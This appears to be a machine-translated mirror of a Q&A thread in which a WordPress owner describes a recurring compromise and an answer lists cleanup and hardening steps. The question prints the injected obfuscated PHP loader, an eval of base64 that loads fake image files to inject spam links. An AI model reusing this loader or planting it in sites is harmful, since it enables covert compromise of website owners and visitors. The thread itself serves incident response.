Wordpress 网站不断遭到黑客攻击 [英] Wordpress Site Keeps Getting Hacked
问题描述
我有一个 Wordpress 网站,它不断被黑客入侵.据我所知,正在进行以下更改:
I have a Wordpress site that keeps getting hacked. As far as I can tell the following changes are being made:
这个文件顶部有一些额外的 PHP 代码:
This file has some additional PHP code at the top:
wp-content/themes/enfold/functions.php
wp-content/themes/enfold/functions.php
如下:
<代码>的eval(BASE64_DECODE( ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoIi9ob21lL2RhdGFidXp6L3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2ltYWdlcy9tYWdpYy5qcGciKTtyZXR1cm4gKCRjaGVlKTt9b2Jfc3RhcnQoImNhbGxiYWNrIik7"));
正在创建 4 个新的 jpg 文件:
and 4 new jpg files are being created:
/wp-includes/images/geo.jpg
/wp-includes/images/geo.jpg
/wp-includes/images/save.jpg
/wp-includes/images/save.jpg
/wp-includes/images/magic.jpg
/wp-includes/images/magic.jpg
/wp-includes/images/links.jpg
/wp-includes/images/links.jpg
这些不是真正的 jpg 文件,因为它们无法打开,但使用文本编辑器查看它们会显示文本和其他 PHP 代码.
These are not real jpg files as they don't open, but looking at them with a text editor reveals text and additional PHP code.
从 PHP 代码来看,它似乎试图将一些垃圾邮件/广告链接注入到我的 Wordpress 帖子中.
From looking at the PHP code it looks like it's trying to inject some spam/advertising links into my Wordpress POSTS.
我一直删除这些文件,我安装了一个安全插件,删除了管理员登录,更改了我所有的密码,但这些文件每隔几天就会继续更新/创建.
I keep delete these files, I've installed a security plugin, removed the admin login, changed all my passwords but these files continue to get updated/created every few days.
我试图了解这是怎么可能的,以及接下来我需要做什么来阻止它.
I'm trying to understand how this is possible and what I need to do next to block this.
推荐答案
首先 - DON'T恐慌.
此时安装防病毒或安全插件几乎没有帮助 - 恶意代码已经可以访问服务器了.
Installing antivirus or security plugins at this point will rarely help - the malisious code has already server access.
1 - 更改 FTP、mysql、DB、Cpanel、WHM 的所有密码 , SSH (如果不需要则禁用)等任何可以访问的东西.
1 - Change ALL the passwords for FTP, mysql , DB , Cpanel , WHM , SSH ( disable if not need ) etc. anything with access.
3 - 检查您的服务器(所有文件夹,如 cgi、cgi-bin、ftp 等..)删除所有 wordpress 文件夹(除了 wp-content),以及所有其他奇怪的文件.删除所有主题和所有插件并手动仔细检查 wp-content 的其余部分.备份数据库并手动检查.
3 - Check your server ( all folders like cgi, cgi-bin, ftp etc ..)
Delete all the wordpress folder ( except wp-content ) , and all other strange files . Delete all themes and all plugins anf Check the rest of wp-content manually and attentively . Backup the DB and manually check it .
3.1 - (EDIT 1) - 禁止在 Cpanel/WHM 中使用索引.并阅读下面的 .htaccess 保护.
3.1 - ( EDIT 1 ) - Disallow indexes in Cpanel / WHM . And read below for .htaccess protections .
2 - 将新的 wordpress CORE 文件上传到 OWN 目录(不是 root )并将其重命名为某些内容其他(不是 wp 或 wordpress ).
2 - Upload new wordpress CORE files to OWN directory ( not root ) and rename it to something else ( not wp or wordpress ).
3 - 更新插件和主题 - 不要复制您拥有的插件和主题,而是从 wp 插件存储库安装新的、更新的插件和新的干净主题.必要时手动检查.
3 - Update Plugin and Themes - do not copy the ones you have , but install fresh, updated ones from the wp plugin repository, and a fresh clean theme . Manually check if necessary .
在您的主题中,检查所有表单或输入字段,并检查输入的正确验证.
In your theme , check for all forms, or input fields, and check for correct validation of input .
4 - 更改 wp-config 中的所有数据库密码.所有的哈希值等.创建一个新的数据库和用户和新密码.在注入之前手动检查数据库备份.
4 - Change all the DB passwords in the wp-config . All the hashes etc .
Create a new Database AND user AND new passwords. Manually check the DB backup BEFORE injecting it back .
4.1 - (编辑我)我忘了提到 - 还要更改 DB 前缀.不要离开wp
4.1 - ( EDIT I ) I forgot to mention - Change also the DB prefix. Do not leave wp
5 - 更改所有 wp 用户密码和用户名.如果您有一个拥有数百名用户的开放站点,那么请编写一个脚本来强制每个人更改密码.如果您只有十几个用户,请手动更改它.当我说所有 - 它包括默认管理员用户(来自过去的版本)
5 - Change all wp user-passwords AND usernames . If you have an open site with hundreds of users than make a script to force everyone to change passwords .If you have only a dozen change it manually . When I said all - It is including the default admin user ( from past versions )
6 - 一段时间后,检查您的服务器日志,看看伪造图像文件的 404 消息是否来自单个 IP 地址(可能不是) - 如果是 - 阻止它.
6 - After some time , check your server log , and see if the 404 messages for the fake image files are from a single ip address ( probably not ) - if they are - block it .
7 - 除了小心之外,您无能为力.这是很多工作,但不要偷懒并遵循所有步骤.否则不仅仅是这个站点,整个服务器都可能受到威胁.一次又一次,.
7 - There is not much more you can do , except being careful. It is a lot of work, but do not be lazy and follow all steps . Otherwise it is not just this one site, but the whole server could be compromised . Again and Again ,.
不再发生这种情况的指南:
Guidelines for that not happening again :
选择强密码.- 我们都不喜欢看起来像
aDf34HG§*#sFGT的密码,但它们很有帮助 - 特别是在DB或其他自动化任务上.对于用户 - 强制至少使用一个符号和一个字母.
Choose Strong passwords . - we all do not like passwords that looks like
aDf34HG§*#sFGT, but they ARE helpful - especially onDBor other automated tasks . For users - Force at least one symbol and one letter.
不要安装您不知道、不完全理解或从可疑来源下载的主题和插件(all-wp-premium-themes-for-free-and-direct-download-all-plugins-for-free 等).
Do not install themes and plugins that you do not know, do not fully understand , or that you have downloaded from questionable sources (
all-wp-premium-themes-for-free-and-direct-download-all-plugins-for-free etc ).
保持 wordpress 核心文件更新.
Keep the wordpress core files updated .
.htaccess
一些指令可以防止(或至少尝试)这种情况再次发生.
Some directives that can prevent ( or at least try to ) this from happening again .
.htaccess 文件在 WordPress 根目录.
.htaccess file in the root directory of WordPress.
#Disallow indexes
Options All -Indexes
# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>
# WPhtC: Protect .htaccess file
<files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
</files>
robots.txt
Disallow: /wp-*
您可以做的另一件事是强制用户(和您自己)在登录管理员时使用 SSL (HTTPS):
Another thing you can do is to force users (and yourself ) to use SSL ( HTTPS ) when login to admin:
define('FORCE_SSL_LOGIN', true);
在那之后 - 您还需要查看您的数据库以查看是否有奇怪的列/表/条目/用户.例如,如果您的网站经常被重定向 - 检查字符串等.. (eval(),exec() ..)
After that - you will also need to peek at your DB to see if have strange columns / tables / entries / users. for example if your site is constantly being redirected - check for strings etc .. (eval(),exec() ..)
您还可以将众多安全插件中的一些用于核心校验和其他上述 php 调用.
You could also use some of the numerous security plugins for core checksums and other the above mentioned php calls.
还有其他更复杂的事情,尤其是在 APACHE 方面.如果我有更多时间,我会在此处发布博客条目和链接.但是上面写的是一个好的开始.
There are other things, more complicated, especially on the APACHE side. If I will have more time, I will post a blog entry and link here. But the above written is a good start .
这篇关于Wordpress 网站不断遭到黑客攻击的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
